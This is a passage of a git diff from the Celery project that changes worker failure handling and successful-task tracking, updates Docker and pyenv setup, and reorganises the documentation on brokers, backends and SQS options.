- if isinstance(exc, Retry):
+ is_terminated = isinstance(exc, Terminated)
+ if is_terminated:
+ # If the task was terminated and the task was not cancelled due
+ # to a connection loss, it is revoked.
+
+ # We always cancel the tasks inside the master process.
+ # If the request was cancelled, it was not revoked and there's
+ # nothing to be done.
+ # According to the comment below, we need to check if the task
+ # is already revoked and if it wasn't, we should announce that
+ # it was.
+ if not self._already_cancelled and not self._already_revoked:
+ # This is a special case where the process
+ # would not have had time to write the result.
+ self._announce_revoked(
+ 'terminated', True, str(exc), False)
+ return
+ elif isinstance(exc, MemoryError):
+ raise MemoryError(f'Process got: {exc}')
+ elif isinstance(exc, Reject):
+ return self.reject(requeue=exc.requeue)
+ elif isinstance(exc, Ignore):
+ return self.acknowledge()
+ elif isinstance(exc, Retry):
return self.on_retry(exc_info)
# (acks_late) acknowledge after result stored.
requeue = False
+ is_worker_lost = isinstance(exc, WorkerLostError)
if self.task.acks_late:
reject = (
self.task.reject_on_worker_lost and
- isinstance(exc, WorkerLostError)
+ is_worker_lost
)
ack = self.task.acks_on_failure_or_timeout
if reject:
@@ -515,19 +570,21 @@ def on_failure(self, exc_info, send_failed_event=True, return_ok=False):
# need to be removed from prefetched local queue
self.reject(requeue=False)
- # These are special cases where the process would not have had time
+ # This is a special case where the process would not have had time
# to write the result.
- if isinstance(exc, Terminated):
- self._announce_revoked(
- 'terminated', True, str(exc), False)
- send_failed_event = False # already sent revoked event
- elif not requeue and (isinstance(exc, WorkerLostError) or not return_ok):
+ if not requeue and (is_worker_lost or not return_ok):
# only mark as failure if task has not been requeued
self.task.backend.mark_as_failure(
self.id, exc, request=self._context,
store_result=self.store_errors,
)
+ signals.task_failure.send(sender=self.task, task_id=self.id,
+ exception=exc, args=self.args,
+ kwargs=self.kwargs,
+ traceback=exc_info.traceback,
+ einfo=exc_info)
+
if send_failed_event:
self.send_event(
'task-failed',
@@ -555,8 +612,8 @@ def info(self, safe=False):
return {
'id': self.id,
'name': self.name,
- 'args': self._args,
- 'kwargs': self._kwargs,
+ 'args': self._args if not safe else self._argsrepr,
+ 'kwargs': self._kwargs if not safe else self._kwargsrepr,
'type': self._type,
'hostname': self._hostname,
'time_start': self.time_start,
@@ -574,7 +631,7 @@ def __str__(self):
self.humaninfo(),
f' ETA:[{self._eta}]' if self._eta else '',
f' expires:[{self._expires}]' if self._expires else '',
- ])
+ ]).strip()
def __repr__(self):
"""``repr(self)``."""
@@ -629,13 +686,16 @@ def group_index(self):
def create_request_cls(base, task, pool, hostname, eventer,
ref=ref, revoked_tasks=revoked_tasks,
- task_ready=task_ready, trace=trace_task_ret):
+ task_ready=task_ready, trace=None, app=current_app):
default_time_limit = task.time_limit
default_soft_time_limit = task.soft_time_limit
apply_async = pool.apply_async
acks_late = task.acks_late
events = eventer and eventer.enabled
+ if trace is None:
+ trace = fast_trace_task if app.use_fast_trace_task else trace_task_ret
+
class Request(base):
def execute_using_pool(self, pool, **kwargs):
diff --git a/celery/worker/state.py b/celery/worker/state.py
index aa8782546c4..3afb2e8e3b9 100644
--- a/celery/worker/state.py
+++ b/celery/worker/state.py
@@ -34,10 +34,17 @@
#: maximum number of revokes to keep in memory.
REVOKES_MAX = 50000
+#: maximum number of successful tasks to keep in memory.
+SUCCESSFUL_MAX = 1000
+
#: how many seconds a revoke will be active before
#: being expired when the max limit has been exceeded.
REVOKE_EXPIRES = 10800
+#: how many seconds a successful task will be cached in memory
+#: before being expired when the max limit has been exceeded.
+SUCCESSFUL_EXPIRES = 10800
+
#: Mapping of reserved task_id->Request.
requests = {}
@@ -47,6 +54,10 @@
#: set of currently active :class:`~celery.worker.request.Request`'s.
active_requests = weakref.WeakSet()
+#: A limited set of successful :class:`~celery.worker.request.Request`'s.
+successful_requests = LimitedSet(maxlen=SUCCESSFUL_MAX,
+ expires=SUCCESSFUL_EXPIRES)
+
#: count of tasks accepted by the worker, sorted by type.
total_count = Counter()
@@ -64,6 +75,7 @@ def reset_state():
requests.clear()
reserved_requests.clear()
active_requests.clear()
+ successful_requests.clear()
total_count.clear()
all_total_count[:] = [0]
revoked.clear()
@@ -98,10 +110,14 @@ def task_accepted(request,
def task_ready(request,
+ successful=False,
remove_request=requests.pop,
discard_active_request=active_requests.discard,
discard_reserved_request=reserved_requests.discard):
"""Update global state when a task is ready."""
+ if successful:
+ successful_requests.add(request.id)
+
remove_request(request.id, None)
discard_active_request(request)
discard_reserved_request(request)
@@ -137,7 +153,7 @@ def on_shutdown():
sum(bench_sample) / len(bench_sample)))
memdump()
- def task_reserved(request): # noqa
+ def task_reserved(request):
"""Called when a task is reserved by the worker."""
global bench_start
global bench_first
@@ -149,7 +165,7 @@ def task_reserved(request): # noqa
return __reserved(request)
- def task_ready(request): # noqa
+ def task_ready(request):
"""Called when a task is completed."""
global all_count
global bench_start
diff --git a/celery/worker/strategy.py b/celery/worker/strategy.py
index 64d3c5337f2..b6e9a17c6b6 100644
--- a/celery/worker/strategy.py
+++ b/celery/worker/strategy.py
@@ -2,8 +2,10 @@
import logging
from kombu.asynchronous.timer import to_timestamp
+from kombu.utils.encoding import safe_repr
from celery import signals
+from celery.app import trace as _app_trace
from celery.exceptions import InvalidTaskError
from celery.utils.imports import symbol_by_name
from celery.utils.log import get_logger
@@ -50,6 +52,7 @@ def hybrid_to_proto2(message, body):
'kwargsrepr': body.get('kwargsrepr'),
'origin': body.get('origin'),
}
+ headers.update(message.headers or {})
embed = {
'callbacks': body.get('callbacks'),
@@ -123,7 +126,7 @@ def default(task, app, consumer,
limit_task = consumer._limit_task
limit_post_eta = consumer._limit_post_eta
Request = symbol_by_name(task.Request)
- Req = create_request_cls(Request, task, consumer.pool, hostname, eventer)
+ Req = create_request_cls(Request, task, consumer.pool, hostname, eventer, app=app)
revoked_tasks = consumer.controller.state.revoked
@@ -147,7 +150,15 @@ def task_message_handler(message, body, ack, reject, callbacks,
body=body, headers=headers, decoded=decoded, utc=utc,
)
if _does_info:
- info('Received task: %s', req)
+ # Similar to `app.trace.info()`, we pass the formatting args as the
+ # `extra` kwarg for custom log handlers
+ context = {
+ 'id': req.id,
+ 'name': req.name,
+ 'args': safe_repr(req.args),
+ 'kwargs': safe_repr(req.kwargs),
+ }
+ info(_app_trace.LOG_RECEIVED, context, extra={'data': context})
if (req.expires or req.id in revoked_tasks) and req.revoked():
return
diff --git a/celery/worker/worker.py b/celery/worker/worker.py
index 382802a2738..f67d1a336da 100644
--- a/celery/worker/worker.py
+++ b/celery/worker/worker.py
@@ -38,7 +38,7 @@
try:
import resource
except ImportError: # pragma: no cover
- resource = None # noqa
+ resource = None
__all__ = ('WorkController',)
diff --git a/docker/Dockerfile b/docker/Dockerfile
index 403052787f8..0cd557070d0 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -1,10 +1,11 @@
-FROM ubuntu:bionic
+FROM ubuntu:focal
+ENV PYTHONUNBUFFERED 1
ENV PYTHONIOENCODING UTF-8
ARG DEBIAN_FRONTEND=noninteractive
-# Pypy is installed from a package manager because it takes so long to build.
+# Pypy3 is installed from a package manager because it takes so long to build.
RUN apt-get update && apt-get install -y build-essential \
libcurl4-openssl-dev \
libffi-dev \
@@ -22,7 +23,8 @@ RUN apt-get update && apt-get install -y build-essential \
libncurses5-dev \
libsqlite3-dev \
wget \
- pypy \
+ pypy3 \
+ pypy3-lib \
python-openssl \
libncursesw5-dev \
zlib1g-dev \
@@ -44,10 +46,10 @@ ENV PATH="$HOME/.pyenv/bin:$PATH"
# Copy and run setup scripts
WORKDIR $PROVISIONING
-COPY docker/scripts/install-couchbase.sh .
-# Scripts will lose thier executable flags on copy. To avoid the extra instructions
+#COPY docker/scripts/install-couchbase.sh .
+# Scripts will lose their executable flags on copy. To avoid the extra instructions
# we call the shell directly.
-RUN sh install-couchbase.sh
+#RUN sh install-couchbase.sh
COPY docker/scripts/create-linux-user.sh .
RUN sh create-linux-user.sh
@@ -64,13 +66,12 @@ COPY --chown=1000:1000 docker/entrypoint /entrypoint
RUN chmod gu+x /entrypoint
# Define the local pyenvs
-RUN pyenv local python3.8 python3.7 python3.6 python3.5 python2.7
+RUN pyenv local python3.8 python3.7 python3.6 python3.9
-RUN pyenv exec python2.7 -m pip install --upgrade pip setuptools wheel && \
- pyenv exec python3.5 -m pip install --upgrade pip setuptools wheel && \
- pyenv exec python3.6 -m pip install --upgrade pip setuptools wheel && \
+RUN pyenv exec python3.6 -m pip install --upgrade pip setuptools wheel && \
pyenv exec python3.7 -m pip install --upgrade pip setuptools wheel && \
- pyenv exec python3.8 -m pip install --upgrade pip setuptools wheel
+ pyenv exec python3.8 -m pip install --upgrade pip setuptools wheel && \
+ pyenv exec python3.9 -m pip install --upgrade pip setuptools wheel
# Setup one celery environment for basic development use
RUN pyenv exec python3.8 -m pip install \
@@ -94,19 +95,14 @@ RUN pyenv exec python3.8 -m pip install \
-r requirements/docs.txt \
-r requirements/test-integration.txt \
-r requirements/pkgutils.txt && \
- pyenv exec python3.5 -m pip install \
+ pyenv exec python3.9 -m pip install \
-r requirements/dev.txt \
-r requirements/test.txt \
-r requirements/test-ci-default.txt \
-r requirements/docs.txt \
-r requirements/test-integration.txt \
- -r requirements/pkgutils.txt && \
- pyenv exec python2.7 -m pip install \
- -r requirements/dev.txt \
- -r requirements/test.txt \
- -r requirements/test-ci-default.txt \
- -r requirements/test-integration.txt \
-r requirements/pkgutils.txt
+
COPY --chown=1000:1000 . $HOME/celery
diff --git a/docker/docker-compose.yml b/docker/docker-compose.yml
index 428fe204475..037947f35e0 100644
--- a/docker/docker-compose.yml
+++ b/docker/docker-compose.yml
@@ -36,4 +36,15 @@ services:
image: dwmkerr/dynamodb:38
azurite:
- image: arafato/azurite:2.6.5
+ image: mcr.microsoft.com/azure-storage/azurite:3.10.0
+
+ docs:
+ image: celery/docs
+ build:
+ context: ..
+ dockerfile: docker/docs/Dockerfile
+ volumes:
+ - ../docs:/docs:z
+ ports:
+ - "7000:7000"
+ command: /start-docs
\ No newline at end of file
diff --git a/docker/docs/Dockerfile b/docker/docs/Dockerfile
new file mode 100644
index 00000000000..616919f2b54
--- /dev/null
+++ b/docker/docs/Dockerfile
@@ -0,0 +1,29 @@
+FROM python:3.9-slim-buster
+
+ENV PYTHONUNBUFFERED 1
+ENV PYTHONDONTWRITEBYTECODE 1
+
+RUN apt-get update \
+ # dependencies for building Python packages
+ && apt-get install -y build-essential \
+ && apt-get install -y texlive \
+ && apt-get install -y texlive-latex-extra \
+ && apt-get install -y dvipng \
+ && apt-get install -y python3-sphinx \
+ # Translations dependencies
+ && apt-get install -y gettext \
+ # cleaning up unused files
+ && apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false \
+ && rm -rf /var/lib/apt/lists/*
+
+# Requirements are installed here to ensure they will be cached.
+COPY /requirements /requirements
+
+# All imports needed for autodoc.
+RUN pip install -r /requirements/docs.txt -r /requirements/default.txt
+
+COPY docker/docs/start /start-docs
+RUN sed -i 's/\r$//g' /start-docs
+RUN chmod +x /start-docs
+
+WORKDIR /docs
\ No newline at end of file
diff --git a/docker/docs/start b/docker/docs/start
new file mode 100644
index 00000000000..9c0b4d4de1d
--- /dev/null
+++ b/docker/docs/start
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+set -o errexit
+set -o pipefail
+set -o nounset
+
+make livehtml
\ No newline at end of file
diff --git a/docker/scripts/install-pyenv.sh b/docker/scripts/install-pyenv.sh
index c52a0b807c1..2f3093ced10 100644
--- a/docker/scripts/install-pyenv.sh
+++ b/docker/scripts/install-pyenv.sh
@@ -7,8 +7,7 @@ curl -L https://raw.githubusercontent.com/pyenv/pyenv-installer/master/bin/pyenv
git clone https://github.com/s1341/pyenv-alias.git $(pyenv root)/plugins/pyenv-alias
# Python versions to test against
-VERSION_ALIAS="python2.7" pyenv install 2.7.17
-VERSION_ALIAS="python3.5" pyenv install 3.5.8
-VERSION_ALIAS="python3.6" pyenv install 3.6.9
-VERSION_ALIAS="python3.7" pyenv install 3.7.5
-VERSION_ALIAS="python3.8" pyenv install 3.8.0
+VERSION_ALIAS="python3.6" pyenv install 3.6.12
+VERSION_ALIAS="python3.7" pyenv install 3.7.9
+VERSION_ALIAS="python3.8" pyenv install 3.8.7
+VERSION_ALIAS="python3.9" pyenv install 3.9.1
diff --git a/docs/Makefile b/docs/Makefile
index 3ec9ca41f78..cfed0cb0fdf 100644
--- a/docs/Makefile
+++ b/docs/Makefile
@@ -6,6 +6,8 @@ SPHINXOPTS =
SPHINXBUILD = sphinx-build
PAPER =
BUILDDIR = _build
+SOURCEDIR = .
+APP = /docs
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
@@ -18,6 +20,7 @@ I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) .
help:
@echo "Please use \`make ' where is one of"
@echo " html to make standalone HTML files"
+ @echo " livehtml to start a local server hosting the docs"
@echo " dirhtml to make HTML files named index.html in directories"
@echo " singlehtml to make a single large HTML file"
@echo " pickle to make pickle files"
@@ -231,3 +234,7 @@ pseudoxml:
$(SPHINXBUILD) -b pseudoxml $(ALLSPHINXOPTS) $(BUILDDIR)/pseudoxml
@echo
@echo "Build finished. The pseudo-XML files are in $(BUILDDIR)/pseudoxml."
+
+.PHONY: livehtml
+livehtml:
+ sphinx-autobuild -b html --host 0.0.0.0 --port 7000 --watch $(APP) -c . $(SOURCEDIR) $(BUILDDIR)/html
\ No newline at end of file
diff --git a/docs/_templates/sidebardonations.html b/docs/_templates/sidebardonations.html
index d6e6dfaa788..2eebc8ec0bc 100644
--- a/docs/_templates/sidebardonations.html
+++ b/docs/_templates/sidebardonations.html
@@ -1,13 +1,9 @@
-
-
Please help support this community project with a donation:
-
+
Donations
+
Please help support this community project with a donation.
+
+
+
diff --git a/docs/conf.py b/docs/conf.py
index 6c7dbc6aaad..f28a5c9c72b 100644
--- a/docs/conf.py
+++ b/docs/conf.py
@@ -10,7 +10,7 @@
github_project='celery/celery',
author='Ask Solem & contributors',
author_name='Ask Solem',
- copyright='2009-2018',
+ copyright='2009-2021',
publisher='Celery Project',
html_logo='images/celery_512.png',
html_favicon='images/favicon.ico',
@@ -23,13 +23,12 @@
],
extra_intersphinx_mapping={
'cyanide': ('https://cyanide.readthedocs.io/en/latest', None),
+ 'click': ('https://click.palletsprojects.com/en/7.x/', None),
},
apicheck_ignore_modules=[
'celery.__main__',
- 'celery.task',
'celery.contrib.testing',
'celery.contrib.testing.tasks',
- 'celery.task.base',
'celery.bin',
'celery.bin.celeryd_detach',
'celery.contrib',
diff --git a/docs/django/first-steps-with-django.rst b/docs/django/first-steps-with-django.rst
index 003edcc8b06..9c9a2f5bc8f 100644
--- a/docs/django/first-steps-with-django.rst
+++ b/docs/django/first-steps-with-django.rst
@@ -19,8 +19,8 @@ Using Celery with Django
.. note::
- Celery 4.0 supports Django 1.8 and newer versions. Please use Celery 3.1
- for versions older than Django 1.8.
+ Celery 5.0.x supports Django 1.11 LTS or newer versions. Please use Celery 4.4.x
+ for versions older than Django 1.11.
To use Celery with your Django project you must first define
an instance of the Celery library (called an "app")
@@ -54,15 +54,8 @@ for simple projects you may use a single contained module that defines
both the app and tasks, like in the :ref:`tut-celery` tutorial.
Let's break down what happens in the first module,
-first we import absolute imports from the future, so that our
-``celery.py`` module won't clash with the library:
-
-.. code-block:: python
-
- from __future__ import absolute_import
-
-Then we set the default :envvar:`DJANGO_SETTINGS_MODULE` environment variable
-for the :program:`celery` command-line program:
+first, we set the default :envvar:`DJANGO_SETTINGS_MODULE` environment
+variable for the :program:`celery` command-line program:
.. code-block:: python
@@ -97,6 +90,18 @@ setting becomes ``CELERY_BROKER_URL``. This also applies to the
workers settings, for instance, the :setting:`worker_concurrency`
setting becomes ``CELERY_WORKER_CONCURRENCY``.
+For example, a Django project's configuration file might include:
+
+.. code-block:: python
+ :caption: settings.py
+
+ ...
+
+ # Celery Configuration Options
+ CELERY_TIMEZONE = "Australia/Tasmania"
+ CELERY_TASK_TRACK_STARTED = True
+ CELERY_TASK_TIME_LIMIT = 30 * 60
+
You can pass the settings object directly instead, but using a string
is better since then the worker doesn't have to serialize the object.
The ``CELERY_`` namespace is also optional, but recommended (to
@@ -148,15 +153,6 @@ concrete app instance:
You can find the full source code for the Django example project at:
https://github.com/celery/celery/tree/master/examples/django/
-.. admonition:: Relative Imports
-
- You have to be consistent in how you import the task module.
- For example, if you have ``project.app`` in ``INSTALLED_APPS``, then you
- must also import the tasks ``from project.app`` or else the names
- of the tasks will end up being different.
-
- See :ref:`task-naming-relative-imports`
-
Extensions
==========
@@ -242,7 +238,7 @@ development it is useful to be able to start a worker instance by using the
.. code-block:: console
- $ celery -A proj worker -l info
+ $ celery -A proj worker -l INFO
For a complete listing of the command-line options available,
use the help command:
diff --git a/docs/getting-started/backends-and-brokers/index.rst b/docs/getting-started/backends-and-brokers/index.rst
new file mode 100644
index 00000000000..d50b0b5e526
--- /dev/null
+++ b/docs/getting-started/backends-and-brokers/index.rst
@@ -0,0 +1,101 @@
+.. _brokers:
+
+======================
+ Backends and Brokers
+======================
+
+:Release: |version|
+:Date: |today|
+
+Celery supports several message transport alternatives.
+
+.. _broker_toc:
+
+Broker Instructions
+===================
+
+.. toctree::
+ :maxdepth: 1
+
+ rabbitmq
+ redis
+ sqs
+
+.. _broker-overview:
+
+Broker Overview
+===============
+
+This is a comparison table of the different transports supported;
+more information can be found in the documentation for each
+individual transport (see :ref:`broker_toc`).
+
++---------------+--------------+----------------+--------------------+
+| **Name** | **Status** | **Monitoring** | **Remote Control** |
++---------------+--------------+----------------+--------------------+
+| *RabbitMQ* | Stable | Yes | Yes |
++---------------+--------------+----------------+--------------------+
+| *Redis* | Stable | Yes | Yes |
++---------------+--------------+----------------+--------------------+
+| *Amazon SQS* | Stable | No | No |
++---------------+--------------+----------------+--------------------+
+| *Zookeeper* | Experimental | No | No |
++---------------+--------------+----------------+--------------------+
+
+Experimental brokers may be functional but they don't have
+dedicated maintainers.
+
+Missing monitor support means that the transport doesn't
+implement events, and as such Flower, `celery events`, `celerymon`
+and other event-based monitoring tools won't work.
+
+Remote control means the ability to inspect and manage workers
+at runtime using the `celery inspect` and `celery control` commands
+(and other tools using the remote control API).
+
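+The same remote control API is also available from Python. A minimal sketch,
+assuming an application instance named ``app``, at least one running worker,
+and a registered task named ``tasks.add`` (both names are only examples):
+
+.. code-block:: python
+
+    # Ask the workers which tasks they are currently executing or have reserved.
+    inspector = app.control.inspect()
+    print(inspector.active())
+    print(inspector.reserved())
+
+    # Ask all workers to change the rate limit of a task at runtime.
+    app.control.rate_limit('tasks.add', '10/m')
+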
+Summaries
+=========
+
+*Note: This section does not cover every available backend and broker.*
+
+Celery can communicate with many different brokers (Message Transports) and store results in many different backends (Result Stores).
+
+Redis
+-----
+
+Redis can be both a backend and a broker.
+
+**As a Broker:** Redis works well for rapid transport of small messages. Large messages can congest the system.
+
+:ref:`See documentation for details `
+
+**As a Backend:** Redis is a super fast K/V store, making it very efficient for fetching the results of a task call. Given the design of Redis, you do have to consider the limited memory available to store your data, and how you handle data persistence. If result persistence is important, consider using another DB for your backend.
+
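+A minimal sketch of using Redis in both roles (assuming a Redis instance on
+``localhost`` with the default port; the database numbers are arbitrary):
+
+.. code-block:: python
+
+    from celery import Celery
+
+    # Redis as both the message broker and the result backend.
+    app = Celery('tasks',
+                 broker='redis://localhost:6379/0',
+                 backend='redis://localhost:6379/1')
+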
+RabbitMQ
+--------
+
+RabbitMQ is a broker.
+
+**As a Broker:** RabbitMQ handles larger messages better than Redis; however, if many messages are coming in very quickly, scaling can become a concern, and Redis or SQS should be considered unless RabbitMQ is running at a very large scale.
+
+:ref:`See documentation for details `
+
+**As a Backend:** RabbitMQ can store results via the ``rpc://`` backend. This backend creates a separate temporary queue for each client.
+
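+A minimal sketch of this setup (assuming a RabbitMQ instance on ``localhost``
+with the default ``guest`` credentials):
+
+.. code-block:: python
+
+    from celery import Celery
+
+    # RabbitMQ as the broker, with the rpc:// backend for results.
+    app = Celery('tasks', broker='amqp://guest@localhost//')
+    app.conf.result_backend = 'rpc://'
+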
+*Note: RabbitMQ (as the broker) and Redis (as the backend) are very commonly used together. If more guaranteed long-term persistence is needed from the result store, consider using PostgreSQL or MySQL (through SQLAlchemy), Cassandra, or a custom defined backend.*
+
+SQS
+---
+
+SQS is a broker.
+
+If you already integrate tightly with AWS, and are familiar with SQS, it presents a great option as a broker. It is extremely scalable and completely managed, and manages task delegation similarly to RabbitMQ. It does lack some of the features of the RabbitMQ broker such as ``worker remote control commands``.
+
+:ref:`See documentation for details `
+
+SQLAlchemy
+----------
+
+SQLAlchemy is a backend.
+
+It allows Celery to interface with MySQL, PostgreSQL, SQLite, and more. It is an ORM, and is the way Celery can use a SQL DB as a result backend. Historically, SQLAlchemy has not been the most stable result backend, so if chosen one should proceed with caution.
diff --git a/docs/getting-started/brokers/rabbitmq.rst b/docs/getting-started/backends-and-brokers/rabbitmq.rst
similarity index 98%
rename from docs/getting-started/brokers/rabbitmq.rst
rename to docs/getting-started/backends-and-brokers/rabbitmq.rst
index 6f5d95dd8ab..430844bdfec 100644
--- a/docs/getting-started/brokers/rabbitmq.rst
+++ b/docs/getting-started/backends-and-brokers/rabbitmq.rst
@@ -86,7 +86,7 @@ documentation`_:
.. code-block:: console
- ruby -e "$(curl -fsSL https://raw.github.com/Homebrew/homebrew/go/install)"
+ /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Finally, we can install RabbitMQ using :command:`brew`:
diff --git a/docs/getting-started/brokers/redis.rst b/docs/getting-started/backends-and-brokers/redis.rst
similarity index 96%
rename from docs/getting-started/brokers/redis.rst
rename to docs/getting-started/backends-and-brokers/redis.rst
index ba4b31aa9bd..9d42397de57 100644
--- a/docs/getting-started/brokers/redis.rst
+++ b/docs/getting-started/backends-and-brokers/redis.rst
@@ -58,6 +58,12 @@ It is also easy to connect directly to a list of Redis Sentinel:
app.conf.broker_url = 'sentinel://localhost:26379;sentinel://localhost:26380;sentinel://localhost:26381'
app.conf.broker_transport_options = { 'master_name': "cluster1" }
+Additional options can be passed to the Sentinel client using ``sentinel_kwargs``:
+
+.. code-block:: python
+
+ app.conf.broker_transport_options = { 'sentinel_kwargs': { 'password': "password" } }
+
.. _redis-visibility_timeout:
Visibility Timeout
diff --git a/docs/getting-started/brokers/sqs.rst b/docs/getting-started/backends-and-brokers/sqs.rst
similarity index 65%
rename from docs/getting-started/brokers/sqs.rst
rename to docs/getting-started/backends-and-brokers/sqs.rst
index 5b108cdc048..cd8fd2a3b33 100644
--- a/docs/getting-started/brokers/sqs.rst
+++ b/docs/getting-started/backends-and-brokers/sqs.rst
@@ -82,7 +82,7 @@ This option is set via the :setting:`broker_transport_options` setting::
broker_transport_options = {'visibility_timeout': 3600} # 1 hour.
-The default visibility timeout is 30 seconds.
+The default visibility timeout is 30 minutes.
Polling Interval
----------------
@@ -137,7 +137,7 @@ Predefined Queues
If you want Celery to use a set of predefined queues in AWS, and to
never attempt to list SQS queues, nor attempt to create or delete them,
-pass a map of queue names to URLs using the :setting:`predefined_queue_urls`
+pass a map of queue names to URLs using the :setting:`predefined_queues`
setting::
broker_transport_options = {
@@ -150,6 +150,70 @@ setting::
}
}
+Back-off policy
+------------------------
+The back-off policy uses the SQS visibility timeout mechanism to alter the time between task retries.
+The mechanism changes the message-specific ``visibility timeout`` from the queue's ``Default visibility timeout`` to the timeout configured in the policy.
+The number of retries is managed by SQS (specifically by the ``ApproximateReceiveCount`` message attribute) and no further action is required by the user.
+
+Configuring the queues and backoff policy::
+
+ broker_transport_options = {
+ 'predefined_queues': {
+ 'my-q': {
+ 'url': 'https://ap-southeast-2.queue.amazonaws.com/123456/my-q',
+ 'access_key_id': 'xxx',
+ 'secret_access_key': 'xxx',
+ 'backoff_policy': {1: 10, 2: 20, 3: 40, 4: 80, 5: 320, 6: 640},
+ 'backoff_tasks': ['svc.tasks.tasks.task1']
+ }
+ }
+ }
+
+
+``backoff_policy`` is a dictionary where the key is the number of retries and the value is the delay in seconds
+between retries (i.e. the SQS visibility timeout).
+``backoff_tasks`` is a list of task names to which the above policy applies.
+
+The above policy:
+
++-----------------------------------------+--------------------------------------------+
+| **Attempt** | **Delay** |
++-----------------------------------------+--------------------------------------------+
+| ``2nd attempt`` | 20 seconds |
++-----------------------------------------+--------------------------------------------+
+| ``3rd attempt`` | 40 seconds |
++-----------------------------------------+--------------------------------------------+
+| ``4th attempt`` | 80 seconds |
++-----------------------------------------+--------------------------------------------+
+| ``5th attempt`` | 320 seconds |
++-----------------------------------------+--------------------------------------------+
+| ``6th attempt`` | 640 seconds |
++-----------------------------------------+--------------------------------------------+
+
+
+STS token authentication
+----------------------------
+
+https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html
+
+AWS STS authentication is supported by using the ``sts_role_arn`` and ``sts_token_timeout`` broker transport options. ``sts_role_arn`` is the assumed IAM role ARN we use to authorize our access to SQS.
+``sts_token_timeout`` is the token timeout, which defaults to (and has a minimum of) 900 seconds. After this period, a new token will be created.
+
+.. code-block:: python
+
+ broker_transport_options = {
+ 'predefined_queues': {
+ 'my-q': {
+ 'url': 'https://ap-southeast-2.queue.amazonaws.com/123456/my-q',
+ 'access_key_id': 'xxx',
+ 'secret_access_key': 'xxx',
+ 'backoff_policy': {1: 10, 2: 20, 3: 40, 4: 80, 5: 320, 6: 640},
+ 'backoff_tasks': ['svc.tasks.tasks.task1']
+ }
+ },
+ 'sts_role_arn': 'arn:aws:iam:::role/STSTest', # optional
+ 'sts_token_timeout': 900 # optional
+ }
+
.. _sqs-caveats:
diff --git a/docs/getting-started/brokers/index.rst b/docs/getting-started/brokers/index.rst
deleted file mode 100644
index 0a2b6a78741..00000000000
--- a/docs/getting-started/brokers/index.rst
+++ /dev/null
@@ -1,54 +0,0 @@
-.. _brokers:
-
-=====================
- Brokers
-=====================
-
-:Release: |version|
-:Date: |today|
-
-Celery supports several message transport alternatives.
-
-.. _broker_toc:
-
-Broker Instructions
-===================
-
-.. toctree::
- :maxdepth: 1
-
- rabbitmq
- redis
- sqs
-
-.. _broker-overview:
-
-Broker Overview
-===============
-
-This is comparison table of the different transports supports,
-more information can be found in the documentation for each
-individual transport (see :ref:`broker_toc`).
-
-+---------------+--------------+----------------+--------------------+
-| **Name** | **Status** | **Monitoring** | **Remote Control** |
-+---------------+--------------+----------------+--------------------+
-| *RabbitMQ* | Stable | Yes | Yes |
-+---------------+--------------+----------------+--------------------+
-| *Redis* | Stable | Yes | Yes |
-+---------------+--------------+----------------+--------------------+
-| *Amazon SQS* | Stable | No | No |
-+---------------+--------------+----------------+--------------------+
-| *Zookeeper* | Experimental | No | No |
-+---------------+--------------+----------------+--------------------+
-
-Experimental brokers may be functional but they don't have
-dedicated maintainers.
-
-Missing monitor support means that the transport doesn't
-implement events, and as such Flower, `celery events`, `celerymon`
-and other event-based monitoring tools won't work.
-
-Remote control means the ability to inspect and manage workers
-at runtime using the `celery inspect` and `celery control` commands
-(and other tools using the remote control API).
diff --git a/docs/getting-started/first-steps-with-celery.rst b/docs/getting-started/first-steps-with-celery.rst
index f3b80c42dbe..a87af8f7201 100644
--- a/docs/getting-started/first-steps-with-celery.rst
+++ b/docs/getting-started/first-steps-with-celery.rst
@@ -141,7 +141,7 @@ This is only needed so that names can be automatically generated when the tasks
defined in the `__main__` module.
The second argument is the broker keyword argument, specifying the URL of the
-message broker you want to use. Here using RabbitMQ (also the default option).
+message broker you want to use. Here we are using RabbitMQ (also the default option).
See :ref:`celerytut-broker` above for more choices --
for RabbitMQ you can use ``amqp://localhost``, or for Redis you can
@@ -159,7 +159,7 @@ argument:
.. code-block:: console
- $ celery -A tasks worker --loglevel=info
+ $ celery -A tasks worker --loglevel=INFO
.. note::
@@ -181,7 +181,7 @@ There are also several other commands available, and help is also available:
.. code-block:: console
- $ celery help
+ $ celery --help
.. _`supervisord`: http://supervisord.org
@@ -229,7 +229,8 @@ and -- or you can define your own.
For this example we use the `rpc` result backend, that sends states
back as transient messages. The backend is specified via the ``backend`` argument to
:class:`@Celery`, (or via the :setting:`result_backend` setting if
-you choose to use a configuration module):
+you choose to use a configuration module). So, you can modify this line in the `tasks.py`
+file to enable the `rpc://` backend:
.. code-block:: python
@@ -244,12 +245,13 @@ the message broker (a popular combination):
To read more about result backends please see :ref:`task-result-backends`.
-Now with the result backend configured, let's call the task again.
-This time you'll hold on to the :class:`~@AsyncResult` instance returned
-when you call a task:
+Now with the result backend configured, close the current python session and import the
+``tasks`` module again to put the changes into effect. This time you'll hold on to the
+:class:`~@AsyncResult` instance returned when you call a task:
.. code-block:: pycon
+ >>> from tasks import add # close and reopen to get updated 'app'
>>> result = add.delay(4, 4)
The :meth:`~@AsyncResult.ready` method returns whether the task
diff --git a/docs/getting-started/index.rst b/docs/getting-started/index.rst
index b590a18d53d..083ccb026f7 100644
--- a/docs/getting-started/index.rst
+++ b/docs/getting-started/index.rst
@@ -9,7 +9,7 @@
:maxdepth: 2
introduction
- brokers/index
+ backends-and-brokers/index
first-steps-with-celery
next-steps
resources
diff --git a/docs/getting-started/introduction.rst b/docs/getting-started/introduction.rst
index ea2162467ae..2797ce60097 100644
--- a/docs/getting-started/introduction.rst
+++ b/docs/getting-started/introduction.rst
@@ -39,13 +39,16 @@ What do I need?
===============
.. sidebar:: Version Requirements
- :subtitle: Celery version 5.0 runs on
+ :subtitle: Celery version 5.2 runs on
- - Python ❨3.6, 3.7, 3.8❩
- - PyPy3.6 ❨7.3❩
+ - Python ❨3.7, 3.8, 3.9, 3.10❩
+ - PyPy3.7, 3.8 ❨7.3.7❩
Celery 4.x was the last version to support Python 2.7,
